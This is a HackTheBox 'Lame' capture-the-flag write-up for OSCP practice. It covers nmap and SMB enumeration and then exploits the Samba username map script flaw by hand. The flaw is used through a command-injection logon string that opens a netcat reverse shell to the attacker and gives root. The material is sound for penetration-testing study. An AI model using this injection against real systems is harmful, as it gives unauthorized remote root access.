[Write-up]: Lame Machine on HackTheBox w/o Metasploit

lame
Hi guys :)

We are going ahead HackTheBox machine solutions for OSCP preparation. In addition, I noticed that I have been preogressing slowly for OSCP exam. Frankly, I must do my best for getting faster. Whatsoever, Second machine is Lame which is retired machines on HackTheBox and very easy.

First thing first, Let’s start with nmap scanning.

Nmap Scanning

1
nmap -sS -sV -T4 -p- 10.10.10.3

Nmap

Nmap scanning result shows us following ports are open and what services are running on those ports. Also it is weird for me. There is no running web server on this machine.

  • Port 21: ftp - vsftpd 2.3.4
  • Port 22: ssh - OpenSSH 4.7p1
  • Port 139,445: Samba smbd 3.x - 4.x

Now, it seems we should find exploit for port version number. Let’s enumarete those ports in turn

Port 21 - FTP (vsftpd 2.3.4)

When we quick search on google, we find backdoor command execution.

1
nmap --script ftp-vsftpd-backdoor -p 21 10.10.10.3

If we check port-21 with nmap script, The backdoor is not triggered. You can see following images.

nmap_port21

Port 22 - SSH (OpenSSH 4.7p1)

For this port, We can brute force attack with auxiliary/scanner/ssh/ssh_login It takes more our time. Therefore, I am going to the next step.

Port 139,445 - Samba (smdb 3.x-4.x)

On this machine, Anonymous login is active. We can use smbclient to access to SMB server without password following command.

1
smbclient -L \\\\10.10.10.3\\

smb_client

Also, We can view the permissions on the shared drivers with smbmap. tmp file has read and write permission

1
smbmap -H 10.10.10.3

smbmap

When we a litte search on google, We found Samba ‘Username’ map script’ Command Execution (Metasploit). We don’t use this metasploit module. When We examine script, we see that following command is used to run command to vulnerable machine. We can get reverse shell by changing payload.encoded

1
"/=`nohup " + payload.encoded + "`"

Rock the machine :)

We connect the smb client to tmp folder following command.

1
smbclient \\\\10.10.10.3\\tmp

After smb client connection, run following connect to get reverse shell.

1
logon "/=`nohup nc -nv <your-machine-ip> 1903 -e /bin/sh`"

We are ROOT! :)

root

See you next blog post. Take care!